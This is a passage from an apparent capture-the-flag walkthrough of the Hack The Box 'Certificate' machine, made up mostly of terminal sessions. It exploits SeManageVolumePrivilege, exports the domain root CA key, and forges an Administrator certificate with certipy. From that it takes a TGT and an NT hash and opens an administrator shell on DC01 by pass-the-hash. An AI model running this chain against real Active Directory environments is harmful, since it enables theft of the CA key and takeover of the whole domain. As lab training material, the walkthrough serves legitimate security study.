  Provider = Microsoft Software Key Storage Provider
Missing stored keyset

================ Certificate 1 ================
Serial Number: 5800000002ca70ea4e42f218a6000000000002
Issuer: CN=Certificate-LTD-CA, DC=certificate, DC=htb
 NotBefore: 11/3/2024 8:14 PM
 NotAfter: 11/3/2025 8:14 PM
Subject: CN=DC01.certificate.htb
Certificate Template Name (Certificate Type): DomainController
Non-root Certificate
Template: DomainController, Domain Controller
Cert Hash(sha1): 779a97b1d8e492b5bafebc02338845ffdff76ad2
  Key Container = 46f11b4056ad38609b08d1dea6880023_7989b711-2e3f-4107-9aae-fb8df2e3b958
  Provider = Microsoft RSA SChannel Cryptographic Provider
Missing stored keyset

================ Certificate 2 ================
Serial Number: 75b2f4bbf31f108945147b466131bdca
Issuer: CN=Certificate-LTD-CA, DC=certificate, DC=htb
 NotBefore: 11/3/2024 3:55 PM
 NotAfter: 11/3/2034 4:05 PM
Subject: CN=Certificate-LTD-CA, DC=certificate, DC=htb
Certificate Template Name (Certificate Type): CA
CA Version: V0.0
Signature matches Public Key
Root Certificate: Subject matches Issuer
Template: CA, Root Certification Authority
Cert Hash(sha1): 2f02901dcff083ed3dbb6cb0a15bbfee6002b1a8
  Key Container = Certificate-LTD-CA
  Provider = Microsoft Software Key Storage Provider
Missing stored keyset
CertUtil: -store command completed successfully.

Certificate 2 is the interesting one.

This certificate is passwordless and self-signed, which means it is the root CA of the domain, so we can perform a Golden Ticket attack.

*Evil-WinRM* PS C:\Users\Ryan.K\WER> ./SeManageVolumeExploit.exe
Entries changed: 880

DONE

*Evil-WinRM* PS C:\Users\Ryan.K\WER> cd ..
*Evil-WinRM* PS C:\Users\Ryan.K> certutil -exportPFX My 75b2f4bbf31f108945147b466131bdca cert.pfx

My "Personal"
================ Certificate 2 ================
Serial Number: 75b2f4bbf31f108945147b466131bdca
Issuer: CN=Certificate-LTD-CA, DC=certificate, DC=htb
 NotBefore: 11/3/2024 3:55 PM
 NotAfter: 11/3/2034 4:05 PM
Subject: CN=Certificate-LTD-CA, DC=certificate, DC=htb
Certificate Template Name (Certificate Type): CA
CA Version: V0.0
Signature matches Public Key
Root Certificate: Subject matches Issuer
Template: CA, Root Certification Authority
Cert Hash(sha1): 2f02901dcff083ed3dbb6cb0a15bbfee6002b1a8
  Key Container = Certificate-LTD-CA
  Unique container name: 26b68cbdfcd6f5e467996e3f3810f3ca_7989b711-2e3f-4107-9aae-fb8df2e3b958
  Provider = Microsoft Software Key Storage Provider
Signature test passed
Enter new password for output file cert.pfx:
Enter new password:
Confirm new password:
CertUtil: -exportPFX command completed successfully.

*Evil-WinRM* PS C:\Users\Ryan.K> download cert.pfx

Info: Downloading C:\Users\Ryan.K\cert.pfx to cert.pfx

Info: Download successful!
*Evil-WinRM* PS C:\Users\Ryan.K> exit

certipy forge -ca-pfx cert.pfx -out golden_ticket.pfx -upn Administrator

certipy auth -pfx golden_ticket.pfx -dc-ip 10.129.200.104 -user Administrator -domain CERTIFICATE.HTB

┌──(certipy-venv)─(root㉿kali)-[/home/kali/BOXES/CERTIFICATE/10.129.200.104]
└─# certipy forge -ca-pfx cert.pfx -out golden_ticket.pfx -upn Administrator

Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Saved forged certificate and private key to 'golden_ticket.pfx'

┌──(certipy-venv)─(root㉿kali)-[/home/kali/BOXES/CERTIFICATE/10.129.200.104]
└─# certipy auth -pfx golden_ticket.pfx -dc-ip 10.129.200.104 -user Administrator -domain CERTIFICATE.HTB

Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Using principal: administrator@certificate.htb
[*] Trying to get TGT...
[-] Got error while trying to request TGT: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)

┌──(certipy-venv)─(root㉿kali)-[/home/kali/BOXES/CERTIFICATE/10.129.200.104]
└─# faketime -f $(ntpdate -q certificate.htb | awk '{print $4}') bash

┌──(certipy-venv)(root㉿kali)-[/home/kali/BOXES/CERTIFICATE/10.129.200.104]
└─# certipy auth -pfx golden_ticket.pfx -dc-ip 10.129.200.104 -user Administrator -domain CERTIFICATE.HTB
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Using principal: administrator@certificate.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@certificate.htb': aad3b435b51404eeaad3b435b51404ee:d804304519bf0143c14cbf1c024408c6

evil-winrm -i 10.129.200.104 -u Administrator -H 'd804304519bf0143c14cbf1c024408c6'

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
certificate\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> hostname
DC01

ADMINISTRATOR SHELL ! 

*Evil-WinRM* PS C:\Users\Administrator\Desktop> whoami
certificate\administrator
*Evil-WinRM* PS C:\Users\Administrator\Desktop> hostname
DC01
*Evil-WinRM* PS C:\Users\Administrator\Desktop> dir


    Directory: C:\Users\Administrator\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---        8/26/2025   7:38 PM             34 root.txt


*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
[REDIRECTED]

ROOT.TXT: [REDIRECTED]




9389/tcp  open  adws
49666/tcp open  unknown
49691/tcp open  unknown
49692/tcp open  unknown
49695/tcp open  unknown
49714/tcp open  unknown
49726/tcp open  unknown
49745/tcp open  unknown
Service Info: Hosts: certificate.htb, DC01; OS: Windows; CPE: cpe:/o:microsoft:windows